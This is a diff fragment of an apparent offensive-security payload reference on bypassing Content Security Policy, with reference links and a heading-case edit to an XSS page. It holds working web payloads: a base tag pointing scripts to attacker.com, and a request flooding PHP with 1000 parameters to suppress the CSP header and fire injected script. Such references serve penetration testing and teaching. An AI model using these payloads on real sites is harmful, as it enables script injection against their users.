+**Payload**:
+
+1. Inject a base tag.
+  ```html
+  <base href=http://www.attacker.com>
+  ```
+2. Host your custom js file at the same path that one of the website's script.
+  ```
+  http://www.attacker.com/PATH.js
+  ```
+
+
+## Bypass CSP header sent by PHP
+
+**Requirements**:
+
+* CSP sent by PHP `header()` function 
+
+
+**Payload**:
+
+In default `php:apache` image configuration, PHP cannot modify headers when the response's data has already been written. This event occurs when a warning is raised by PHP engine.
+
+Here are several ways to generate a warning:
+
+- 1000 $_GET parameters
+- 1000 $_POST parameters
+- 20 $_FILES
+
+If the **Warning** are configured to be displayed you should get these:
+
+* **Warning**: `PHP Request Startup: Input variables exceeded 1000. To increase the limit change max_input_vars in php.ini. in Unknown on line 0`
+* **Warning**: `Cannot modify header information - headers already sent in /var/www/html/index.php on line 2`
+
+
+```ps1
+GET /?xss=<script>alert(1)</script>&a&a&a&a&a&a&a&a...[REPEATED &a 1000 times]&a&a&a&a
+```
+
+Source: [@pilvar222](https://twitter.com/pilvar222/status/1784618120902005070)
+
+
+
+## References
+
+- [Airbnb – When Bypassing JSON Encoding, XSS Filter, WAF, CSP, and Auditor turns into Eight Vulnerabilities - Brett Buerhaus (@bbuerhaus) - March 8, 2017](https://buer.haus/2017/03/08/airbnb-when-bypassing-json-encoding-xss-filter-waf-csp-and-auditor-turns-into-eight-vulnerabilities/)
+- [D1T1 - So We Broke All CSPs - Michele Spagnuolo and Lukas Weichselbaum - 27 Jun 2017](http://web.archive.org/web/20170627043828/https://conference.hitb.org/hitbsecconf2017ams/materials/D1T1%20-%20Michele%20Spagnuolo%20and%20Lukas%20Wilschelbaum%20-%20So%20We%20Broke%20All%20CSPS.pdf)
+- [Making an XSS triggered by CSP bypass on Twitter - wiki.ioin.in(查看原文) - 2020-04-06](https://www.buaq.net/go-25883.html)
--- a/Injection/XSS
+++ b/Injection/XSS
@ -4,7 +4,7 @@

 * [Client Side Template Injection](#client-side-template-injection)
  * [Stored/Reflected XSS](#storedreflected-xss)
-  * [Advanced bypassing XSS](#advanced-bypassing-xss)
+  * [Advanced Bypassing XSS](#advanced-bypassing-xss)
  * [Blind XSS](#blind-xss)
 * [Automatic Sanitization](#automatic-sanitization)
 * [References](#references)
@ -161,7 +161,7 @@ AngularJS 1.0.1 - 1.1.5 and Vue JS
 {{constructor.constructor('alert(1)')()}}
 ```

-### Advanced bypassing XSS
+### Advanced Bypassing XSS

 AngularJS (without `'` single and `"` double quotes) by [@Viren](https://twitter.com/VirenPawar_)

--- a/Injection/README.md
+++ b/Injection/README.md